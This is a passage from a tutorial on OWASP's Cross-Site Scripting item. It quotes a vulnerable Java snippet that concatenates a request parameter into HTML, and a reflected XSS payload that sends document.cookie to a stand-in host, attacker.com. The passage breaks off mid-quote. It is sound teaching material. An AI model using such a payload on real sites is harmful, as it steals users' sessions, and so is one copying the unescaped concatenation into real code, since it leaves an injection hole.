A3 – Cross-Site Scripting (XSS)
XSS is said to be one of the most problematic security issues due to the lack of knowledge about it and its lack of prevention among the developer's community.
This is quite simple in some of its implementations, though, and that's why it is so dangerous. There are three known forms of XSS attacks: stored, reflected, and DOM based.
One of the official examples of these attacks (reflected) presents the following code:
"<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";That is, the pages build an input field based on a request. Also, an attacker can modify the page in this way:
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
What happens? The inserted code reflects the requested information about a user to the attacker, or to say it as in the OWASP documentation:
"This causes the victim's SessionID is sent to the attacker's website, allowing the attacker to...
